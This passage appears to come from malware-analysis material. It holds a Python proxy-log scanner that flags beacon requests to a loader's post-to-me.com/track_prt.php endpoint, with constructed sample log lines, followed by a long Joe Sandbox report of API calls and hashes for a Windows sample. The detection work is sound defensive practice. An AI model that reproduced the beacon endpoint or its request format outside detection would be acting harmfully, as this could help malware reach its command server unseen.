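    """Return one hit dict per log line whose URL matches the beacon pattern."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line.strip())
        if not match:
            continue  # skip lines that do not follow the assumed format
        ts, client, _method, url, _status = match.groups()
        parsed = is_beacon_url(url)
        if parsed is None:
            continue
        sub, cc = parsed
        hits.append({"ts": ts, "client": client, "sub": sub, "cc": cc})
    return hits


# Constructed sample log lines (not real traffic): two beacons, two decoys.
SAMPLE_LOG = [
    "2024-10-25T10:00:01Z 10.0.0.5 GET https://post-to-me.com/track_prt.php?sub=abc123&cc=DE 200",
    "2024-10-25T10:00:02Z 10.0.0.5 GET https://example.com/index.html 200",
    "2024-10-25T10:00:03Z 10.0.0.7 GET http://post-to-me.com/track_prt.php?sub=xyz&cc=DE 404",
    "2024-10-25T10:00:04Z 10.0.0.9 GET https://post-to-me.com/other.php?sub=abc&cc=DE 200",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit)
```

The check keys on host plus path plus the presence of both query parameters, not on the literal "&cc=DE", because a different build of the same loader could carry another country code while keeping the same endpoint; a hit with a cc other than DE is still worth seeing.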
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\jicQJ2cdlM.exe,00000104), ref: 0042F773
                                                                                    • _free.LIBCMT ref: 0042F83E
                                                                                    • _free.LIBCMT ref: 0042F848
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$FileModuleName
                                                                                    • String ID: C:\Users\user\Desktop\jicQJ2cdlM.exe
                                                                                    • API String ID: 2506810119-2409927387
                                                                                    • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                    • Instruction ID: 2f2bce9173a2d2ca0187e045b48802aae097e8e7c4f0e2c97b909a8c245fc2df
                                                                                    • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                    • Instruction Fuzzy Hash: 47319371B00228ABDB21EF99AC8189FBBFCEF95314B90407BE80497211D7749E45CB59
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\jicQJ2cdlM.exe,00000104), ref: 00A0F9DA
                                                                                    • _free.LIBCMT ref: 00A0FAA5
                                                                                    • _free.LIBCMT ref: 00A0FAAF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$FileModuleName
                                                                                    • String ID: C:\Users\user\Desktop\jicQJ2cdlM.exe
                                                                                    • API String ID: 2506810119-2409927387
                                                                                    • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                    • Instruction ID: 9fa44c5dd0583763b6263a9e07ea62197506b2b9ed878ec6886078f62a0d8e3f
                                                                                    • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                    • Instruction Fuzzy Hash: 33316071A0025CEFDB31DF99AD8199EBBFCEF99750B104076F809A7291D6709E44CB90
                                                                                    APIs
                                                                                    • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 00A03071
                                                                                      • Part of subcall function 009F8AD2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 009F8ADD
                                                                                    • SafeSQueue.LIBCONCRT ref: 00A0308A
                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 00A0314A
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A0316B
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00A03179
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                                    • String ID: 11@
                                                                                    • API String ID: 3496964030-1785270423
                                                                                    • Opcode ID: f5b94dce39a4837ba2e296382e939281c1cc6f51ac582c5d2e9b37c10b4daf25
                                                                                    • Instruction ID: b6355da4cfc988b32b6637978764f9134dad3ea6af089a4917bf4a3e1c95cdf0
                                                                                    • Opcode Fuzzy Hash: f5b94dce39a4837ba2e296382e939281c1cc6f51ac582c5d2e9b37c10b4daf25
                                                                                    • Instruction Fuzzy Hash: 432104367006098FCF15AF28D890BBA7BA5EF84310F044199ED068B397CB70ED05CB91
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00A121E4), ref: 00A0E220
                                                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00A121E4), ref: 00A0E25A
                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 00A0E261
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitFeatureLastPresentProcessorThreadUser
                                                                                    • String ID: 11@
                                                                                    • API String ID: 1079102050-1785270423
                                                                                    • Opcode ID: 8b5411bbe6c94bee456d29a8542aa325eb684c89ca07275a9873d682f3d1ed15
                                                                                    • Instruction ID: 90d312bf4035326088b14cff4cd56557bc9508686e8b789c4fd0d0bad9ee9d57
                                                                                    • Opcode Fuzzy Hash: 8b5411bbe6c94bee456d29a8542aa325eb684c89ca07275a9873d682f3d1ed15
                                                                                    • Instruction Fuzzy Hash: 1B113A34640309AAEF04BB70BE0BBED3768AF59B04F100968F9006B1D3DBB199809661
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00A121E4), ref: 00A0E220
                                                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00A121E4), ref: 00A0E25A
                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 00A0E261
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitFeatureLastPresentProcessorThreadUser
                                                                                    • String ID: 11@
                                                                                    • API String ID: 1079102050-1785270423
                                                                                    • Opcode ID: 5e5341ce53e2f92f90f8bdb878e6b423528209b15d53d5dd393f874dedd460f1
                                                                                    • Instruction ID: 63cead5fc892d1fc7a1cc4b30a0c1261911af173697b66506e4eef3d86fcca21
                                                                                    • Opcode Fuzzy Hash: 5e5341ce53e2f92f90f8bdb878e6b423528209b15d53d5dd393f874dedd460f1
                                                                                    • Instruction Fuzzy Hash: 90114C74A40308ABEF04FB70BE0BFED3764AF55B04F100969F9046B1D3DBB159809661
                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(0000000D,?,0040DE66,0040C67E,?,?,00000000,?,0040C54E,0045D5E4,0040C51B,0045D5DC,?,ios_base::failbit set,0040C67E), ref: 0040EFCF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID: 11@$f(@
                                                                                    • API String ID: 1452528299-1277599000
                                                                                    • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                    • Instruction ID: 215b6f0c2c260135b977075f1765c75d61afaaca07cd8a2d2b7a33b83608daf3
                                                                                    • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                    • Instruction Fuzzy Hash: 24110236204117BFCF125F62DC4456BBB65FF08712B14443AF905AB290DA749820ABD5
                                                                                    APIs
                                                                                    • Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 00425F2D
                                                                                      • Part of subcall function 00424EFA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F17
                                                                                      • Part of subcall function 00424EFA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F2C
                                                                                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00425F60
                                                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00425F8B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
                                                                                    • String ID: 11@
                                                                                    • API String ID: 2684344702-1785270423
                                                                                    • Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                                                    • Instruction ID: cb3a2859ed7aecbb53c8f7ff5db8590c6937c5e0b26f296ff23853c6e0f13c92
                                                                                    • Opcode Fuzzy Hash: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                                                    • Instruction Fuzzy Hash: CB01DB35700629ABCF01DF54D5808AE77B9EF89354B55006AEC06DB301DA34DE05DB60
                                                                                    APIs
                                                                                    • Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 00A06194
                                                                                      • Part of subcall function 00A05161: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00A0517E
                                                                                      • Part of subcall function 00A05161: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00A05193
                                                                                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00A061C7
                                                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00A061F2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
                                                                                    • String ID: 11@
                                                                                    • API String ID: 2684344702-1785270423
                                                                                    • Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                                                    • Instruction ID: 13d11dab1e052034e069dee10299674e96d821d78b3940a7ae29db64661970fb
                                                                                    • Opcode Fuzzy Hash: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                                                    • Instruction Fuzzy Hash: FB019675A0061DABCF05DF64D5809AE77FAEF89354B140065ED06EB342DA70EE059BA0
                                                                                    APIs
                                                                                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00411B62
                                                                                      • Part of subcall function 00410A71: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00410A84
                                                                                      • Part of subcall function 00410A71: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00410A8E
                                                                                    • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00411B7B
                                                                                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411BC1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
                                                                                    • String ID: 11@
                                                                                    • API String ID: 2524916244-1785270423
                                                                                    • Opcode ID: c968d17d0eadf1c0e28c283ecf804fc7f7f2f76cc6bcee2e82d4d123140e7899
                                                                                    • Instruction ID: 77abca4beb8e4c97e8764394de2025186321a16057fa486c0768a76d67dfeb06
                                                                                    • Opcode Fuzzy Hash: c968d17d0eadf1c0e28c283ecf804fc7f7f2f76cc6bcee2e82d4d123140e7899
                                                                                    • Instruction Fuzzy Hash: D201D6359042248BDF11AB50C450BFDB372AF84714F1440AADA116B3A5DBBCBE41C799
                                                                                    APIs
                                                                                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 009F1DC9
                                                                                      • Part of subcall function 009F0CD8: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 009F0CEB
                                                                                      • Part of subcall function 009F0CD8: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 009F0CF5
                                                                                    • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 009F1DE2
                                                                                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 009F1E28
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
                                                                                    • String ID: 11@
                                                                                    • API String ID: 2524916244-1785270423
                                                                                    • Opcode ID: c968d17d0eadf1c0e28c283ecf804fc7f7f2f76cc6bcee2e82d4d123140e7899
                                                                                    • Instruction ID: 4a414a012e4c9c4c3f28c00d3269b4dd255add39a8aad4985fe88b25daaaf0f8
                                                                                    • Opcode Fuzzy Hash: c968d17d0eadf1c0e28c283ecf804fc7f7f2f76cc6bcee2e82d4d123140e7899
                                                                                    • Instruction Fuzzy Hash: DA018C35A00228CBDF19AB64C8547BDB37AAFC4350F184055DA126B386CB74AD06CBD1
                                                                                    APIs
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA73
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041DA81
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                    • String ID: 11@$pContext
                                                                                    • API String ID: 1687795959-1086721755
                                                                                    • Opcode ID: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                                                    • Instruction ID: 9010ffe1b6885ba769d18c3576365b3581292a7ba769087c8389302fb8d97d4f
                                                                                    • Opcode Fuzzy Hash: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                                                    • Instruction Fuzzy Hash: B5F0593AB006159BCB04EB59DC45C5EF7A8AF85B64710007BFD01E3342CFB8EE058698
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,004496AC,00000000,?,?,?,00A1011C,00000000,?,00A100BC,00000000,00457970,0000000C,00A10213,00000000,00000002), ref: 00A1018B
                                                                                    • GetProcAddress.KERNEL32(00000000,004496C4), ref: 00A1019E
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00A1011C,00000000,?,00A100BC,00000000,00457970,0000000C,00A10213,00000000,00000002), ref: 00A101C1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: 11@
                                                                                    • API String ID: 4061214504-1785270423
                                                                                    • Opcode ID: ec107a19a1f6916f8ddc3040fc448cd7ce5ab95be265ea966da4c8f834c9d8ef
                                                                                    • Instruction ID: 2bc5e584d4fb7fa007acef8d3a1171e55c1ed40792b0475d39177b39548ebaac
                                                                                    • Opcode Fuzzy Hash: ec107a19a1f6916f8ddc3040fc448cd7ce5ab95be265ea966da4c8f834c9d8ef
                                                                                    • Instruction Fuzzy Hash: F4F06834600218FFDB119F50DD49BEEBFB4EF45B12F150175F809A2150CBB99E80DA54
                                                                                    APIs
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009EC903
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throw
                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                    • API String ID: 2005118841-1866435925
                                                                                    • Opcode ID: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                                                    • Instruction ID: 4059e63142be6f720363e6877bfa63ab255e6af077e1016ade1d9108b54b6df6
                                                                                    • Opcode Fuzzy Hash: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                                                    • Instruction Fuzzy Hash: B6F021F3C0024C6BCB05E955CD42BEF379C6B05341F148456EDD666183E7689D07C794
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00431F7D), ref: 0042DFB9
                                                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                                                    • ExitThread.KERNEL32 ref: 0042DFFA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                    • String ID: f(@
                                                                                    • API String ID: 3213686812-2560262586
                                                                                    • Opcode ID: 77ac3720ff8c63f5b54c7ead9ba54d6db249791c5ee017c1279202a925d4012e
                                                                                    • Instruction ID: 69bc41ef776010156a50f9e736d675acab369240ea0dcafc6817c09100241395
                                                                                    • Opcode Fuzzy Hash: 77ac3720ff8c63f5b54c7ead9ba54d6db249791c5ee017c1279202a925d4012e
                                                                                    • Instruction Fuzzy Hash: 1FF0E260B8432639FA2037A2BD0BBAA16150F24B0DF96042BBE0A991C3DE9C9551416D
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_catchmake_shared
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 3472968176-2084237596
                                                                                    • Opcode ID: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                                                    • Instruction ID: f9e995c398efcf6b728d42fb0e338a96b5fd94b0d24f152253124dea499137f7
                                                                                    • Opcode Fuzzy Hash: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                                                    • Instruction Fuzzy Hash: B2F0627050012CCFDB21EF68E512A6D7BB4BF41B44F4980A2F4404B363CB789E94CBA1
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00431F7D), ref: 0042DFB9
                                                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                                                    • ExitThread.KERNEL32 ref: 0042DFFA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                    • String ID: f(@
                                                                                    • API String ID: 3213686812-2560262586
                                                                                    • Opcode ID: 7b9273de92e7b6936eaf880de14e0e220afece78540420b5bcfd49e854584d78
                                                                                    • Instruction ID: 0285dfc7d7792d99b816c6e179ba3485ab9a4e2f62b66e3f0321d916b514c371
                                                                                    • Opcode Fuzzy Hash: 7b9273de92e7b6936eaf880de14e0e220afece78540420b5bcfd49e854584d78
                                                                                    • Instruction Fuzzy Hash: EEF0557078432535FA203BA2BD0FB961A240F10B0EF56002BBF09991C3DEEC9690416D
                                                                                    APIs
                                                                                    • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 00424319
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042432B
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00424339
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                                                    • String ID: pScheduler
                                                                                    • API String ID: 1381464787-923244539
                                                                                    • Opcode ID: 34e1c130fc1cf947503754e169bfa26c3fbc22ee7f1814df8cddcc9c2b5f3f5b
                                                                                    • Instruction ID: dcb9093c936754fa26cda4c49a5e66a6ec85891f206a073b4e5aa53fece02954
                                                                                    • Opcode Fuzzy Hash: 34e1c130fc1cf947503754e169bfa26c3fbc22ee7f1814df8cddcc9c2b5f3f5b
                                                                                    • Instruction Fuzzy Hash: 23F0A731B0122467C718FB55E842D9E77B99E403087D0816FB802A3182CF7CA949C69D
                                                                                    APIs
                                                                                    • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 009FE8C6
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 009FE8D9
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009FE8E7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                    • String ID: 11@
                                                                                    • API String ID: 1990795212-1785270423
                                                                                    • Opcode ID: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                                                    • Instruction ID: 6e648cfcc41d491c94a06c19e5f143425589e43447be8e1a65e3660e2e0e359c
                                                                                    • Opcode Fuzzy Hash: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                                                    • Instruction Fuzzy Hash: 0AE06835B0010C27CB00FB29EC06C6DBBADAEC0B503140026FA11A3393DFB4AE0986C8
                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,0042E12D,00000000), ref: 0042E073
                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,?,0042E12D,00000000), ref: 0042E082
                                                                                    • _free.LIBCMT ref: 0042E089
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseFreeHandleLibrary_free
                                                                                    • String ID: -B
                                                                                    • API String ID: 621396759-1993606306
                                                                                    • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                    • Instruction ID: 17050b68875c52b9acd6c54ac6ffc846a702ed9b00f998fe1c0864977ee07d81
                                                                                    • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                    • Instruction Fuzzy Hash: E9E08632101A34AFD7315F57F808B57BBD4EF15722F54C52AE41911560C7B9AD82CB9C
                                                                                    APIs
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DDA
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DE8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                    • String ID: pScheduler$version
                                                                                    • API String ID: 1687795959-3154422776
                                                                                    • Opcode ID: 4d660d84671934de918ba001a7b24dcb35a14defb486b3a9e887b252b602c9d4
                                                                                    • Instruction ID: 654ef00f808b34ad7b75b8e59998346ebad61dbc4125ce9a21f33dce7aa536fc
                                                                                    • Opcode Fuzzy Hash: 4d660d84671934de918ba001a7b24dcb35a14defb486b3a9e887b252b602c9d4
                                                                                    • Instruction Fuzzy Hash: 5CE04F30900608F6CB14AA55D80ABDD77A45B11749F60C02B7855610D29ABCA6D8CB4A
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: __alldvrm$_strrchr
                                                                                    • String ID:
                                                                                    • API String ID: 1036877536-0
                                                                                    • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                    • Instruction ID: f9eb826db87fdf2ea4d980863b0040f81c60248b0af39ab0b887e88b27670142
                                                                                    • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                    • Instruction Fuzzy Hash: BEA14871A00B869FEB11DE18C8917AEFBE5EF19310F18426FE5859B381C27C9D41C799
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __alldvrm$_strrchr
                                                                                    • String ID:
                                                                                    • API String ID: 1036877536-0
                                                                                    • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                    • Instruction ID: b89291596e2c86922fa2462ae5908d363b779ce2d0064f065ee395dde20b18f4
